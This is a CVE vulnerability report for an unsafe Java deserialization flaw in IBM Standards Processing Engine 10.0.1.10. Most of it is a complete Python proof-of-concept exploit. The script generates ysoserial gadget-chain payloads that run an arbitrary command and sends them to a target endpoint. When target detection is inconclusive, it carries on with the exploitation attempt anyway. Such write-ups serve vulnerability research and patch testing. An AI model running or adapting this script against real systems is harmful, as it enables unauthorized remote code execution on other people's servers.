Security Vulnerability Report
CVE-2023-49886 CVSS 9.8 CRITICAL

CVE-2023-49886

Published: 2025-10-06 15:16:01
Last Modified: 2025-10-16 18:13:38

Description

IBM Standards Processing Engine 10.0.1.10 could allow a remote attacker to execute arbitrary code on the system, caused by unsafe Java deserialization. By sending specially crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-502 (Deserialization of Untrusted Data)

Configurations (Affected Products)

cpe:2.3:a:ibm:transformation_extender_advanced:10.0.1:*:*:*:*:*:*:* - VULNERABLE
IBM Standards Processing Engine 10.0.1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2023-49886 PoC - IBM Standards Processing Engine Unsafe Deserialization RCE

Description:
    This PoC demonstrates the exploitation of an unsafe Java deserialization
    vulnerability in IBM Standards Processing Engine 10.0.1.10. It generates a
    malicious serialized payload using the ysoserial tool and sends it to the
    target endpoint.
"""

import argparse
import subprocess

import requests


def generate_payload(gadget, command, output_file="payload.bin"):
    """
    Generate a malicious Java serialized payload using ysoserial.

    gadget: The gadget chain to use (e.g., CommonsCollections1, CommonsBeanutils1)
    command: The system command to execute on the target
    output_file: The output file path for the generated payload
    """
    try:
        # Using ysoserial to generate the malicious serialized object;
        # ysoserial-all.jar is expected in the current working directory.
        cmd = ["java", "-jar", "ysoserial-all.jar", gadget, command]
        with open(output_file, "wb") as f:
            subprocess.run(cmd, stdout=f, check=True)
        print(f"[+] Payload generated successfully: {output_file}")
        return True
    except Exception as e:
        print(f"[-] Error generating payload: {e}")
        return False


def exploit(target_url, payload_file, headers=None):
    """
    Send the malicious serialized payload to the target IBM Standards Processing Engine.

    target_url: The vulnerable endpoint URL
    payload_file: The path to the generated payload file
    headers: Optional HTTP headers
    """
    if headers is None:
        headers = {
            "Content-Type": "application/x-java-serialized-object",
            "User-Agent": "Mozilla/5.0",
        }
    try:
        with open(payload_file, "rb") as f:
            payload = f.read()
        print(f"[*] Sending payload to {target_url}")
        response = requests.post(target_url, data=payload, headers=headers, timeout=30)
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Length: {len(response.content)}")
        # A 200 or 500 status is only a weak heuristic: it shows the endpoint
        # consumed the request, not that the gadget chain actually executed.
        if response.status_code == 200 or response.status_code == 500:
            print("[+] Target appears to be vulnerable!")
            return True
        else:
            print("[-] Target may not be vulnerable.")
            return False
    except Exception as e:
        print(f"[-] Exploitation error: {e}")
        return False


def detect_target(target_url):
    """
    Detect if the target is running IBM Standards Processing Engine.
    """
    try:
        response = requests.get(target_url, timeout=10)
        server = response.headers.get("Server", "")
        powered_by = response.headers.get("X-Powered-By", "")
        indicators = ["IBM", "Standards Processing", "WebSphere"]
        for indicator in indicators:
            if indicator.lower() in (server + powered_by).lower():
                print(f"[+] Detected target indicator: {indicator}")
                return True
        # No indicator matched; the script still continues, so this check
        # never blocks the request on its own.
        print("[*] Target identification inconclusive, proceeding with exploitation attempt...")
        return True
    except Exception as e:
        print(f"[-] Detection error: {e}")
        return False


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2023-49886 PoC Exploit")
    parser.add_argument("-u", "--url", required=True,
                        help="Target URL (e.g., http://target:port/endpoint)")
    parser.add_argument("-g", "--gadget", default="CommonsCollections1",
                        help="ysoserial gadget chain")
    parser.add_argument("-c", "--command", default="whoami",
                        help="Command to execute on target")
    parser.add_argument("-o", "--output", default="payload.bin",
                        help="Payload output file")
    args = parser.parse_args()

    print("=" * 60)
    print("CVE-2023-49886 - IBM Standards Processing Engine RCE PoC")
    print("=" * 60)

    if detect_target(args.url):
        if generate_payload(args.gadget, args.command, args.output):
            exploit(args.url, args.output)
    print("[*] Done.")
```

References

https://www.ibm.com/support/pages/node/7247179 - IBM vendor advisory